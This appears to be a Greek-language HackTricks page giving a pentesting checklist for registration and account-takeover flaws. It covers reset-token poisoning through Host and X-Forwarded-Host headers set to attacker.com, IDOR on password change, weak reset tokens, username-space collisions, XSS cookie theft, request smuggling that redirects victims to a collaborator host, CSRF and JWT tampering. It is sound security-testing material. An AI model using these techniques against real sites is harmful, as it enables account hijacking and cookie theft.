Registration & Takeover Vulnerabilities
Last updated
Last updated
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Προσπαθήστε να δημιουργήσετε χρησιμοποιώντας ένα υπάρχον όνομα χρήστη
Ελέγξτε ποικιλία στο email:
κεφαλαία
+1@
προσθέστε κάποιο τελεία στο email
ειδικούς χαρακτήρες στο όνομα email (%00, %09, %20)
Βάλτε μαύρους χαρακτήρες μετά το email: test@test.com a
victim@gmail.com@attacker.com
victim@attacker.com@gmail.com
Ελέγξτε αν μπορείτε να καταλάβετε πότε ένα όνομα χρήστη έχει ήδη καταχωρηθεί μέσα στην εφαρμογή.
Δημιουργώντας έναν χρήστη ελέγξτε την πολιτική κωδικών πρόσβασης (ελέγξτε αν μπορείτε να χρησιμοποιήσετε αδύναμους κωδικούς). Σε αυτή την περίπτωση μπορείτε να προσπαθήσετε να κάνετε bruteforce τα διαπιστευτήρια.
Check this page για να μάθετε πώς να προσπαθήσετε να αναλάβετε λογαριασμούς ή να εξάγετε πληροφορίες μέσω SQL Injections σε φόρμες καταχώρησης.
Όταν καταχωρηθείτε προσπαθήστε να αλλάξετε το email και ελέγξτε αν αυτή η αλλαγή επικυρώνεται σωστά ή αν μπορείτε να την αλλάξετε σε αυθαίρετα emails.
Ελέγξτε αν μπορείτε να χρησιμοποιήσετε disposable emails
Μακρύς κωδικός (>200) οδηγεί σε DoS
Ελέγξτε τα όρια ρυθμού στη δημιουργία λογαριασμών
Χρησιμοποιήστε username@burp_collab.net και αναλύστε το callback
Ζητήστε επαναφορά κωδικού πρόσβασης στη διεύθυνση email σας
Κάντε κλικ στον σύνδεσμο επαναφοράς κωδικού πρόσβασης
Μην αλλάξετε τον κωδικό
Κάντε κλικ σε οποιαδήποτε 3η ιστοσελίδα (π.χ.: Facebook, twitter)
Παρεμβάλετε το αίτημα στο Burp Suite proxy
Ελέγξτε αν η κεφαλίδα referer διαρρέει το token επαναφοράς κωδικού πρόσβασης.
Παρεμβάλετε το αίτημα επαναφοράς κωδικού πρόσβασης στο Burp Suite
Προσθέστε ή επεξεργαστείτε τις παρακάτω κεφαλίδες στο Burp Suite : Host: attacker.com
, X-Forwarded-Host: attacker.com
Προωθήστε το αίτημα με την τροποποιημένη κεφαλίδα
http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com
Αναζητήστε μια διεύθυνση URL επαναφοράς κωδικού πρόσβασης με βάση την κεφαλίδα host όπως : https://attacker.com/reset-password.php?token=TOKEN
Ο επιτιθέμενος πρέπει να συνδεθεί με τον λογαριασμό του και να μεταβεί στη λειτουργία Αλλαγή κωδικού.
Ξεκινήστε το Burp Suite και παγώστε το αίτημα.
Στείλτε το στην καρτέλα επαναλήπτη και επεξεργαστείτε τις παραμέτρους: User ID/email
powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})
Το token επαναφοράς κωδικού πρέπει να δημιουργείται τυχαία και να είναι μοναδικό κάθε φορά. Δοκιμάστε να προσδιορίσετε αν το token λήγει ή αν είναι πάντα το ίδιο, σε ορισμένες περιπτώσεις ο αλγόριθμος δημιουργίας είναι αδύναμος και μπορεί να μαντευτεί. Οι παρακάτω μεταβλητές μπορεί να χρησιμοποιηθούν από τον αλγόριθμο.
Χρονική σήμανση
UserID
Email του χρήστη
Όνομα και Επώνυμο
Ημερομηνία Γέννησης
Κρυπτογραφία
Μόνο αριθμοί
Μικρή ακολουθία token (χαρακτήρες μεταξύ [A-Z,a-z,0-9])
Επαναχρησιμοποίηση token
Ημερομηνία λήξης token
Προκαλέστε ένα αίτημα επαναφοράς κωδικού χρησιμοποιώντας το API/UI για μια συγκεκριμένη διεύθυνση email π.χ: test@mail.com
Εξετάστε την απάντηση του διακομιστή και ελέγξτε για resetToken
Στη συνέχεια, χρησιμοποιήστε το token σε μια διεύθυνση URL όπως https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]
Εγγραφείτε στο σύστημα με ένα όνομα χρήστη ταυτόσημο με το όνομα χρήστη του θύματος, αλλά με κενά διαστήματα πριν και/ή μετά το όνομα χρήστη. π.χ: "admin "
Ζητήστε μια επαναφορά κωδικού με το κακόβουλο όνομα χρήστη σας.
Χρησιμοποιήστε το token που στάλθηκε στο email σας και επαναφέρετε τον κωδικό του θύματος.
Συνδεθείτε στον λογαριασμό του θύματος με τον νέο κωδικό.
Η πλατφόρμα CTFd ήταν ευάλωτη σε αυτή την επίθεση. Δείτε: CVE-2020-7245
Βρείτε ένα XSS μέσα στην εφαρμογή ή σε μια υποτομέα αν τα cookies είναι περιορισμένα στον γονικό τομέα: *.domain.com
Διαρρεύστε το τρέχον cookie συνεδρίας
Αυθεντικοποιηθείτε ως ο χρήστης χρησιμοποιώντας το cookie
1. Χρησιμοποιήστε smuggler για να ανιχνεύσετε τον τύπο HTTP Request Smuggling (CL, TE, CL.TE)
powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h
2. Δημιουργήστε ένα αίτημα που θα αντικαταστήσει το POST / HTTP/1.1
με τα παρακάτω δεδομένα:
GET http://something.burpcollaborator.net HTTP/1.1 X:
με στόχο να ανοίξετε ανακατεύθυνση των θυμάτων στο burpcollab και να κλέψετε τα cookies τους
3. Το τελικό αίτημα θα μπορούσε να μοιάζει με το εξής
Hackerone reports exploiting this bug * https://hackerone.com/reports/737140 * https://hackerone.com/reports/771666
Δημιουργήστε ένα payload για το CSRF, π.χ: “HTML φόρμα με αυτόματη υποβολή για αλλαγή κωδικού”
Στείλτε το payload
Το JSON Web Token μπορεί να χρησιμοποιηθεί για την αυθεντικοποίηση ενός χρήστη.
Επεξεργαστείτε το JWT με άλλο User ID / Email
Ελέγξτε για αδύναμη υπογραφή JWT
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)